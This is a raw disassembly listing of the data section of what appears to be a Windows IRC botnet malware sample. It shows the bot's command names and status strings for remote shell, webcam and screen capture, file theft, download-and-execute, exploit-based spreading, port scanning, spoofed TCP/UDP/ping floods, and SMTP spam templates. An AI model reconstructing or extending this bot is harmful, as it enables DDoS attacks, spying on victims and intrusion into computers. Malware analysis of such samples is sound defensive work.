aLookupSS_ db ' Lookup: %s -> %s.',0
unk_435FE8 db 2 ; DATA XREF: sub_40EE72:loc_4139F0�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 72h, 6Fh
db 63h ; c
db 65h, 2 dup(73h)
db 65h ; e
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aFailedToTermin db 'Failed to terminate process: %s',0
unk_436028 db 2 ; DATA XREF: sub_40EE72+4B74�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 72h, 6Fh
db 63h ; c
db 65h, 2 dup(73h)
db 65h ; e
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aProcessKilledS db 'Process killed: %s',0
align 4
unk_43605C db 2 ; DATA XREF: sub_40EE72:loc_413990�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 72h, 6Fh
db 63h ; c
db 65h, 2 dup(73h)
db 65h ; e
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aFailedToTerm_0 db 'Failed to terminate process ID: %s',0
align 10h
unk_4360A0 db 2 ; DATA XREF: sub_40EE72+4B17�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 72h, 6Fh
db 63h ; c
db 65h, 2 dup(73h)
db 65h ; e
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aProcessKilledI db 'Process killed ID: %s',0
align 4
dword_4360D8 dd 7A026E02h, 201F6D1Fh, 6C696628h, 1F702E65h, 29671F6Ch
; DATA XREF: sub_40EE72+4AD2�o
dd 0BBBB0220h, 44202002h, 74656C65h, 27206465h, 2E277325h
dd 0
dword_436104 dd 7A026E02h, 201F6D1Fh, 63636428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+4A4D�o
dd 2BBBB02h
aSendFileSUserS db ' Send File: %s, User: %s.',0
align 4
dword_436138 dd 7A026E02h, 201F6D1Fh, 6C696628h, 1F702E65h, 29671F6Ch
; DATA XREF: sub_40EE72+49D2�o
dd 0BBBB0220h, 4C202002h, 3A747369h, 732520h
unk_43615C db 2 ; DATA XREF: sub_40EE72+49B4�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 76h, 69h, 73h
db 69h ; i
db 74h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ;
db 2, 2 dup(20h)
aFailedToSta_15 db 'Failed to start connection thread, error: <%d>.',0
dword_4361A8 dd 7A026E02h, 201F6D1Fh, 73697628h, 702E7469h, 671F6C1Fh
; DATA XREF: sub_40EE72+4945�o
dd 0BB022029h, 202002BBh, 3A4C5255h, 2E732520h, 0
dword_4361D0 dd 7A026E02h, 201F6D1Fh, 72696D28h, 1F702E63h, 29671F6Ch
; DATA XREF: sub_40EE72:loc_413745�o
dd 0BBBB0220h, 43202002h, 616D6D6Fh, 7320646Eh, 2E746E65h
dd 0
unk_4361FC db 2 ; DATA XREF: sub_40EE72+48C9�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 6Dh, 69h, 72h
db 63h ; c
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aClientNotOpen_ db ' Client not open.',0
dword_436228 dd 7A026E02h, 201F6D1Fh, 646D6328h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+4898�o
dd 2BBBB02h, 6F432020h, 6E616D6Dh, 203A7364h, 7325h
dword_436250 dd 7A026E02h, 201F6D1Fh, 646D6328h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+488D�o
dd 2BBBB02h
aErrorSendingTo db ' Error sending to remote shell.',0
align 4
dword_43628C dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+484D�o
dd 2BBBB02h
aReadFileFailed db ' Read file failed: %s',0
align 4
dword_4362BC dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+4839�o
dd 2BBBB02h
aReadFileComple db ' Read file complete: %s',0
align 10h
dword_4362F0 dd 7A026E02h, 201F6D1Fh, 70616328h, 65727574h, 6C1F702Eh
; DATA XREF: sub_40EE72:loc_413639�o
dd 2029671Fh, 2BBBB02h
aInvalidParam_0 db ' Invalid parameters for amateur video capture.',0
dword_43633C dd 7A026E02h, 201F6D1Fh, 70616328h, 65727574h, 6C1F702Eh
; DATA XREF: sub_40EE72:loc_41362F�o
dd 2029671Fh, 2BBBB02h
aErrorWhileCapt db ' Error while capturing amateur video from webcam.',0
align 4
dword_43638C dd 7A026E02h, 201F6D1Fh, 70616328h, 65727574h, 6C1F702Eh
; DATA XREF: sub_40EE72+47B3�o
dd 2029671Fh, 2BBBB02h
aAmateurVideoSa db ' Amateur video saved to: %s.',0
align 4
dword_4363C8 dd 7A026E02h, 201F6D1Fh, 70616328h, 65727574h, 6C1F702Eh
; DATA XREF: sub_40EE72:loc_41358D�o
dd 2029671Fh, 2BBBB02h
aInvalidParam_1 db ' Invalid parameters for webcam capture.',0
align 10h
dword_436410 dd 7A026E02h, 201F6D1Fh, 70616328h, 65727574h, 6C1F702Eh
; DATA XREF: sub_40EE72:loc_413586�o
dd 2029671Fh, 2BBBB02h
aErrorWhileCa_0 db ' Error while capturing from webcam.',0
align 4
dword_436454 dd 7A026E02h, 201F6D1Fh, 70616328h, 65727574h, 6C1F702Eh
; DATA XREF: sub_40EE72+4704�o
dd 2029671Fh, 2BBBB02h
aWebcamCaptureS db ' Webcam capture saved to: %s.',0
align 10h
aFrame db 'frame',0 ; DATA XREF: sub_40EE72:loc_4134FA�o
align 4
dword_436498 dd 7A026E02h, 201F6D1Fh, 70616328h, 65727574h, 6C1F702Eh
; DATA XREF: sub_40EE72+467B�o
dd 2029671Fh, 2BBBB02h
aDriverListComp db ' Driver list complete.',0
dword_4364CC dd 7A026E02h, 201F6D1Fh, 70616328h, 65727574h, 6C1F702Eh
; DATA XREF: sub_40EE72+4645�o
dd 2029671Fh, 2BBBB02h
aDriverDSS_ db ' Driver #%d - %s - %s.',0
aDrivers db 'drivers',0 ; DATA XREF: sub_40EE72:loc_413463�o
dword_436508 dd 7A026E02h, 201F6D1Fh, 70616328h, 65727574h, 6C1F702Eh
; DATA XREF: sub_40EE72:loc_413450�o
dd 2029671Fh, 2BBBB02h
aNoFilenameSpec db ' No filename specified for screen capture.',0
dword_436550 dd 7A026E02h, 201F6D1Fh, 70616328h, 65727574h, 6C1F702Eh
; DATA XREF: sub_40EE72:loc_413449�o
dd 2029671Fh, 2BBBB02h
aErrorWhileCa_1 db ' Error while capturing screen.',0
dword_43658C dd 7A026E02h, 201F6D1Fh, 70616328h, 65727574h, 6C1F702Eh
; DATA XREF: sub_40EE72+45C7�o
dd 2029671Fh, 2BBBB02h
aScreenCaptureS db ' Screen capture saved to: %s.',0
align 4
aScreen db 'screen',0 ; DATA XREF: sub_40EE72:loc_413400�o
align 10h
dword_4365D0 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+4576�o
dd 2BBBB02h, 65472020h, 736F6874h, 25203A74h, 2E73h
dword_4365F8 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+4532�o
dd 2BBBB02h
aUnableToExtrac db ' Unable to extract Gethost command.',0
align 4
dword_436638 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+4516�o
dd 2BBBB02h
aGethostSComman db ' Gethost: %s, Command: %s',0
align 4
dword_43666C dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+4496�o
dd 2BBBB02h
aAliasAddedS_ db ' Alias added: %s.',0
align 4
dword_436698 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+445F�o
dd 2BBBB02h
aPrivmsgSS_ db ' Privmsg: %s: %s.',0
align 4
dword_4366C4 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+4411�o
dd 2BBBB02h
aActionSS_ db ' Action: %s: %s.',0
align 10h
dword_4366F0 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+43A0�o
dd 2BBBB02h, 79432020h, 2E656C63h, 0
dword_436714 dd 54524150h, 0D732520h, 0Ah ; DATA XREF: sub_40EE72+4366�o
; sub_40EE72+4E76�o
dword_436720 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+433F�o
dd 2BBBB02h
aModeChangeS db ' Mode change: %s',0
align 4
aModeS db 'MODE %s',0Dh,0Ah,0 ; DATA XREF: sub_40EE72+432E�o
align 4
dword_436758 dd 7A026E02h, 201F6D1Fh, 6F6C6328h, 2E73656Eh, 1F6C1F70h
; DATA XREF: sub_40EE72+4305�o
dd 2202967h, 2002BBBBh, 77615220h, 73252820h, 25203A29h
dd 73h
dword_436784 dd 7A026E02h, 201F6D1Fh, 6F6C6328h, 2E73656Eh, 1F6C1F70h
; DATA XREF: sub_40EE72+4297�o
dd 2202967h, 2002BBBBh, 646F4D20h, 25282065h, 203A2973h
dd 7325h
dword_4367B0 dd 45444F4Dh, 732520h ; DATA XREF: sub_40EE72+423F�o
dword_4367B8 dd 7A026E02h, 201F6D1Fh, 6F6C6328h, 2E73656Eh, 1F6C1F70h
; DATA XREF: sub_40EE72+4212�o
dd 2202967h, 2002BBBBh, 63694E20h, 2528206Bh, 203A2973h
dd 7325h
dword_4367E4 dd 4B43494Eh, 732520h ; DATA XREF: sub_40EE72+41B9�o
; sub_40EE72+4CAD�o
dword_4367EC dd 4E494F4Ah, 20732520h, 7325h ; DATA XREF: sub_40EE72+419A�o
dword_4367F8 dd 54524150h, 732520h ; DATA XREF: sub_40EE72+4130�o
dword_436800 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72:loc_412F8F�o
dd 2BBBB02h
aRepeatNotAllow db ' Repeat not allowed in command line: %s',0
align 4
dword_436844 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+40E6�o
dd 2BBBB02h, 65522020h, 74616570h, 7325203Ah, 0
aRepeat db 'repeat',0 ; DATA XREF: sub_40EE72+4092�o
align 4
dword_436874 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72:loc_412EBC�o
dd 2BBBB02h, 65442020h, 2E79616Ch, 0
dword_436898 dd 25207325h, 73252073h, 73253A20h, 0 ; DATA XREF: sub_40EE72+400A�o
; sub_40EE72+40BD�o ...
unk_4368A8 db 2 ; DATA XREF: sub_40EE72:loc_412E29�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 75h, 70h, 64h
db 61h ; a
db 74h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ;
db 0BBh, 2, 20h
aBotIdMustBeDif db ' Bot ID must be different than current running process.',0
unk_4368FC db 2 ; DATA XREF: sub_40EE72+3FAD�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 75h, 70h, 64h
db 61h ; a
db 74h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ;
db 0BBh, 2, 20h
aFailedToStartD db ' Failed to start download thread, error: <%d>.',0
align 4
unk_436948 db 2 ; DATA XREF: sub_40EE72+3F3E�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 75h, 70h, 64h
db 61h ; a
db 74h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ;
db 0BBh, 2, 20h
aDownloadingUpd db ' Downloading update from: %s.',0
align 4
aSS_exe db '%s%s.exe',0 ; DATA XREF: sub_40EE72+3E95�o
align 10h
dword_436990 dd 7A026E02h, 201F6D1Fh, 65786528h, 1F702E63h, 29671F6Ch
; DATA XREF: sub_40EE72+3E33�o
dd 0BBBB0220h, 43202002h, 616D6D6Fh, 3A73646Eh, 732520h
unk_4369B8 db 2 ; DATA XREF: sub_40EE72+3E28�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 65h, 78h, 65h
db 63h ; c
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aCouldnTExecute db ' Couldn',27h,'t execute file.',0
align 4
unk_4369EC db 2 ; DATA XREF: sub_40EE72+3DA0�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 69h, 6Eh
db 64h ; d
db 66h, 69h, 6Ch
db 65h ; e
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToSta_16 db ' Failed to start search thread, error: <%d>.',0
align 4
unk_436A38 db 2 ; DATA XREF: sub_40EE72+3D26�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 69h, 6Eh
db 64h ; d
db 66h, 69h, 6Ch
db 65h ; e
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aSearchingFor_0 db ' Searching for file: %s in: %s.',0
align 4
dword_436A78 dd 7A026E02h, 201F6D1Fh, 6C696628h, 1F702E65h, 29671F6Ch
; DATA XREF: sub_40EE72:loc_412AF9�o
; sub_40EE72:loc_413962�o
dd 0BBBB0220h, 2002h
unk_436A94 db 2 ; DATA XREF: sub_40EE72+3C6F�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 69h, 6Ch
db 65h ; e
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aRenameSToS_ db ' Rename: ',27h,'%s',27h,' to: ',27h,'%s',27h,'.',0
align 4
unk_436AC8 db 2 ; DATA XREF: sub_40EE72:loc_412ABF�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 69h, 63h, 6Dh
db 70h ; p
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aInvalidFloodTi db ' Invalid flood time must be greater than 0.',0
align 10h
unk_436B10 db 2 ; DATA XREF: sub_40EE72+3C43�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 69h, 63h, 6Dh
db 70h ; p
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToStartF db ' Failed to start flood thread, error: <%d>.',0
align 4
unk_436B58 db 2 ; DATA XREF: sub_40EE72+3BCF�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 69h, 63h, 6Dh
db 70h ; p
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFloodingSForSS db ' Flooding: (%s) for %s seconds.',0
align 4
unk_436B94 db 2 ; DATA XREF: sub_40EE72+3B4C�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 63h, 6Ch, 6Fh
db 6Eh ; n
db 65h, 73h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ;
db 0BBh, 2, 20h
aFailedToSta_17 db ' Failed to start clone thread, error: <%d>.',0
unk_436BDC db 2 ; DATA XREF: sub_40EE72+3ADD�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 63h, 6Ch, 6Fh
db 6Eh ; n
db 65h, 73h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ;
db 0BBh, 2, 20h
aCreatedOnSDInC db ' Created on %s:%d, in channel %s.',0
align 4
unk_436C1C db 2 ; DATA XREF: sub_40EE72+3A55�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 2 dup(64h), 6Fh
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToSta_18 db ' Failed to start flood thread, error: <%d>.',0
align 4
unk_436C64 db 2 ; DATA XREF: sub_40EE72+39E6�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 2 dup(64h), 6Fh
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFloodingSSForS db ' Flooding: (%s:%s) for %s seconds.',0
align 4
dword_436CA4 dd 7A026E02h, 201F6D1Fh, 6E797328h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+3948�o
dd 2BBBB02h
aFailedToSta_19 db ' Failed to start flood thread, error: <%d>.',0
align 4
dword_436CEC dd 7A026E02h, 201F6D1Fh, 6E797328h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+38D7�o
dd 2BBBB02h
aFloodingSSFo_0 db ' Flooding: (%s:%s) for %s seconds.',0
unk_436D28 db 2 ; DATA XREF: sub_40EE72+385E�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 64h, 6Fh, 77h
db 6Eh ; n
db 6Ch, 6Fh, 61h
db 64h ; d
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToStartT db ' Failed to start transfer thread, error: <%d>.',0
align 4
unk_436D78 db 2 ; DATA XREF: sub_40EE72+37EF�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 64h, 6Fh, 77h
db 6Eh ; n
db 6Ch, 6Fh, 61h
db 64h ; d
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aDownloadingUrl db ' Downloading URL: %s to: %s.',0
align 4
unk_436DB4 db 2 ; DATA XREF: sub_40EE72+371D�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 72h, 65h, 64h
db 69h ; i
db 72h, 65h, 63h
db 74h ; t
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToStartR db ' Failed to start redirection thread, error: <%d>.',0
align 4
unk_436E08 db 2 ; DATA XREF: sub_40EE72+36AE�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 72h, 65h, 64h
db 69h ; i
db 72h, 65h, 63h
db 74h ; t
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aTcpRedirectCre db ' TCP redirect created from: %s:%d to: %s:%d.',0
unk_436E54 db 2 ; DATA XREF: sub_40EE72+3620�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 6Fh, 72h
db 74h ; t
db 73h, 63h, 61h
db 6Eh ; n
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToSta_20 db ' Failed to start scan thread, error: <%d>.',0
align 10h
unk_436EA0 db 2 ; DATA XREF: sub_40EE72+35B1�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 6Fh, 72h
db 74h ; t
db 73h, 63h, 61h
db 6Eh ; n
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aPortScanStarte db ' Port scan started: %s:%d with delay: %d(ms).',0
aSSS_0 db '[%s] <%s> %s',0 ; DATA XREF: sub_40EE72+352D�o
align 4
aSSS_1 db '[%s] * %s %s',0 ; DATA XREF: sub_40EE72+3430�o
align 4
dword_436F0C dd 54434101h, 204E4F49h, 17325h ; DATA XREF: sub_40EE72+33A2�o
; sub_40EE72+43EF�o
unk_436F18 db 2 ; DATA XREF: sub_40EE72+3340�o
; sub_40EE72+5177�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 72h, 2 dup(6Fh)
db 74h ; t
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToSta_21 db ' Failed to start scan thread, error: <%d>.',0
align 10h
unk_436F60 db 2 ; DATA XREF: sub_40EE72+32D1�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 72h, 2 dup(6Fh)
db 74h ; t
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aSExploitationS db ' %s Exploitation started on %s:%d waiting %d seconds for %d minu'
db 'tes using %d threads.',0
aSequential db 'Sequential',0 ; DATA XREF: sub_40EE72+32A6�o
; sub_40EE72+50DB�o
align 4
aRandom_0 db 'Random',0 ; DATA XREF: sub_40EE72+329F�o
; sub_40EE72+50D4�o
align 4
unk_436FE4 db 2 ; DATA XREF: sub_40EE72+3161�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 72h, 2 dup(6Fh)
db 74h ; t
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToSta_22 db ' Failed to start scan, no IP specified.',0
align 4
unk_437028 db 2 ; DATA XREF: sub_40EE72+301A�o
; sub_40EE72+4F1F�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 72h, 2 dup(6Fh)
db 74h ; t
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aAlreadyDScanni db ' Already %d scanning threads. Too many specified.',0
dword_437074 dd 7A026E02h, 201F6D1Fh, 70647528h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+2FE9�o
dd 2BBBB02h
aFailedToSta_23 db ' Failed to start flood thread, error: <%d>.',0
align 4
dword_4370BC dd 7A026E02h, 201F6D1Fh, 70647528h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+2F7A�o
dd 2BBBB02h
aSendingDPacket db ' Sending %d packets to: %s. Packet size: %d, Delay: %d(ms).',0
align 4
aIcmp_dllNotAva db 'ICMP.dll not available',0 ; DATA XREF: sub_40EE72+2EA2�o
align 4
unk_43712C db 2 ; DATA XREF: sub_40EE72+2E8D�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 69h, 6Eh
db 67h ; g
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToSta_24 db ' Failed to start flood thread, error: <%d>.',0
align 4
unk_437174 db 2 ; DATA XREF: sub_40EE72+2E22�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 69h, 6Eh
db 67h ; g
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aSendingDPingsT db ' Sending %d pings to %s. packet size: %d, timeout: %d(ms).',0
align 4
dword_4371CC dd 7A026E02h, 201F6D1Fh, 70637428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72:loc_411BF4�o
dd 2BBBB02h
aInvalidFlood_0 db ' Invalid flood time must be greater than 0.',0
align 4
dword_437214 dd 7A026E02h, 201F6D1Fh, 70637428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+2D78�o
dd 2BBBB02h
aFailedToSta_25 db ' Failed to start flood thread, error: <%d>.',0
align 4
dword_43725C dd 7A026E02h, 201F6D1Fh, 70637428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+2CFE�o
dd 2BBBB02h
aSSFloodingSSFo db ' %s %s flooding: (%s:%s) for %s seconds.',0
align 10h
aNormal db 'Normal',0 ; DATA XREF: sub_40EE72+2CEE�o
align 4
aSpoofed db 'Spoofed',0 ; DATA XREF: sub_40EE72+2CE7�o
dword_4372B0 dd 7A026E02h, 201F6D1Fh, 70637428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+2C4C�o
dd 2BBBB02h
aInvalidFloodTy db ' Invalid flood type specified.',0
dword_4372E8 dd 7A026E02h, 201F6D1Fh, 70746628h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72:loc_4119D3�o
dd 2BBBB02h
aUploadingFileS db ' Uploading file: %s to: %s failed.',0
dword_437324 dd 7A026E02h, 201F6D1Fh, 70746628h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+2B5A�o
dd 2BBBB02h
aUploadingFil_0 db ' Uploading file: %s to: %s',0
aFtp_exe db 'ftp.exe',0 ; DATA XREF: sub_40EE72+2B43�o
aSS_4 db '-s:%s',0 ; DATA XREF: sub_40EE72+2B2C�o
align 4
aOpenSSSSPutSBy db 'open %s',0Dh,0Ah ; DATA XREF: sub_40EE72+2B09�o
db '%s',0Dh,0Ah
db '%s',0Dh,0Ah
db '%s',0Dh,0Ah
db 'put %s',0Dh,0Ah
db 'bye',0Dh,0Ah,0
align 4
aSIII_dll db '%s\%i%i%i.dll',0 ; DATA XREF: sub_40EE72+2AD4�o
align 4
dword_43739C dd 7A026E02h, 201F6D1Fh, 70746628h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+2A8A�o
dd 2BBBB02h
aFileNotFoundS_ db ' File not found: %s.',0
align 4
aFtp_upload db 'ftp.upload',0 ; DATA XREF: sub_40EE72+2A67�o
align 4
aUtil_hcon db 'util.hcon',0 ; DATA XREF: sub_40EE72+2A44�o
align 4
aUtil_httpcon db 'util.httpcon',0 ; DATA XREF: sub_40EE72+2A2D�o
align 4
unk_4373F4 db 3 ; DATA XREF: sub_40EE72+2A11�o
db 31h, 35h, 2Ch
db 31h ; 1
db 34h, 6Eh, 7Ah
db 6Dh ; m
db 20h, 3, 32h
db 2Eh ; .
db 2Eh, 20h, 3
db 31h ; 1
db 35h, 28h, 65h
db 6Dh ; m
db 61h, 69h, 6Ch
db 3
db 32h, 2Eh, 3
db 31h ; 1
db 35h, 6Dh, 6Fh
db 64h ; d
db 29h, 20h, 3
db 32h ; 2
db 0BBh, 3, 31h
a5MessageSentTo db '5 Message sent to %s.',0
align 4
aHeloRndnickMai db 'helo $rndnick',0Ah ; DATA XREF: sub_40EE72+299D�o
db 'mail from: <%s>',0Ah
db 'rcpt to: <%s>',0Ah
db 'data',0Ah
db 'subject: %s',0Ah
db 'from: %s',0Ah
db '%s',0Ah
db '.',0Ah,0
a__1: ; DATA XREF: sub_40EE72+2901�o
unicode 0, <_>,0
aUtil_email db 'util.email',0 ; DATA XREF: sub_40EE72+28B2�o
align 10h
aDdos_tcpf db 'ddos.tcpf',0 ; DATA XREF: sub_40EE72+289B�o
align 4
aDdos_tcpflood db 'ddos.tcpflood',0 ; DATA XREF: sub_40EE72+2884�o
align 4
aP: ; DATA XREF: sub_40EE72+286D�o
unicode 0, <p>,0
aDdos_pingf db 'ddos.pingf',0 ; DATA XREF: sub_40EE72+2856�o
align 4
aDdos_pingflood db 'ddos.pingflood',0 ; DATA XREF: sub_40EE72+283F�o
align 4
aU_0: ; DATA XREF: sub_40EE72+2828�o
unicode 0, <u>,0
aDdos_udpf db 'ddos.udpf',0 ; DATA XREF: sub_40EE72+2811�o
align 4
aDdos_udpflood db 'ddos.udpflood',0 ; DATA XREF: sub_40EE72+27FA�o
align 4
aAdv db 'adv',0 ; DATA XREF: sub_40EE72+27E3�o
aAdvscan db 'advscan',0 ; DATA XREF: sub_40EE72+27CC�o
